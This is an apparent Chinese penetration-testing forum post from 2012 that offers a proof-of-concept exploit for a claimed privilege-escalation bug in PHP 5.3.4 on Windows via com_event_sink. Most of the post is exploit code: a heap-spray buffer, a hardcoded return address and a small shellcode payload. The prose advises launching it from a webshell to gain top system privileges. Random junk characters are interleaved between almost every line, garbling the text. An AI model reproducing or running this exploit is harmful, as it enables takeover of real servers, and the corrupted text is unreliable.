中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
$ A9 a) W% U& Z+ \5 W) S0 x
9 M! q% O, J$ q: v1 w, e/ \
测试方法如下:cmd /c x:\php\php.exe x:\test.php
( F- Z0 w3 {" M& E, R7 v
5 O. |- k. Z; O! E1 Q; V
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
/ n3 k: q9 U2 F( k3 B
这里是两个测试的截图:
+ Z7 t- [9 k$ Z% a D4 K/ D1 R
9 Y' g+ \/ Q. U. S9 N6 O% ^7 U% x
& l5 Y, o# S" x+ m# f
" u) g/ a! K- Y: S5 |: Y& C% v/ E
, `/ r( O5 h- y0 J$ r4 s( u+ ~- W
" t' y2 ~) x$ r
成功利用此漏洞的攻击者将获得系统的最高权限
/ E9 ^! `) W. K# d
6 L* _0 i* M+ [$ U# B9 w; v
# R" Q. I9 j* ~3 s' i! v
8 C8 F. {# X4 R7 ?
0 O# N& c. u5 W6 k& ?' k
4 |, W8 |, w9 ~/ A1 f
关于漏洞分析稍后附上。一下是PoC代码:
* k$ o7 K/ z* N2 M4 b
/ o- C9 a# f& N9 K6 [$ a
<?php
9 i& u( p( y7 X, l, ]
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
q0 g+ w1 ^( \$ }" d7 |
//$eip ="\x44\x43\x42\x41";
( H6 }6 V+ v/ E8 _2 q$ h
$eip= "\x4b\xe8\x57\x78";
* ?7 u2 q+ y, N, j; l, r* g; B
$eax ="\x80\x01\x8d\x04";
1 A {/ l' f% ?8 \& J: `
$deodrant="";
. z: B! R) X4 a+ |3 U, ]
$axespray = str_repeat($eip.$eax,0x80);
- R, ]9 I1 t( D0 C2 R/ E0 u- X q
//048d0190
" ?( D' n# |, B9 a
echo strlen($axespray);
9 K; {& {- L$ {
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
% a8 \- l1 v& d7 o
echo "Silic Group Hacker Army - BlackBap.Org";
! M3 S) k9 ^' h! c
//19200 ==4B32 4b00
7 @6 Y4 C1 ~0 s+ i# \
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
, f: j. D( x8 p G
$terminate = "T";
/ b9 a4 ]; R( e k" J9 A% O
$u[] =$deodrant;
7 ?6 o# C4 Z: @& h* l
$r[] =$deodrant.$terminate;
" \7 M( W3 K( v3 U5 _# _
$a[] =$deodrant.$terminate;
( E6 r* u! s9 f8 \/ Z f5 W
$s[] =$deodrant.$terminate;
9 A5 _5 p, p& ~! e1 f+ q# B1 l# j
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
k) o- K! w/ @# q5 a
$vVar = new VARIANT(0x048d0000+180);
! J% w% l, M' c: o
//弹窗代码(Shellcode)
( G& M5 N/ I# c3 d- u; B
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
* q4 p. O& H; l& A: E* `3 Z$ B
$var2 = new VARIANT(0x41414242);
( ~5 z q* V4 U$ k1 K( n3 t6 v/ J6 s
com_event_sink($vVar,$var2,$buffer);
4 t* V8 X+ g& K: @7 P" p. r
?>
* V& q0 L1 ^9 x
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2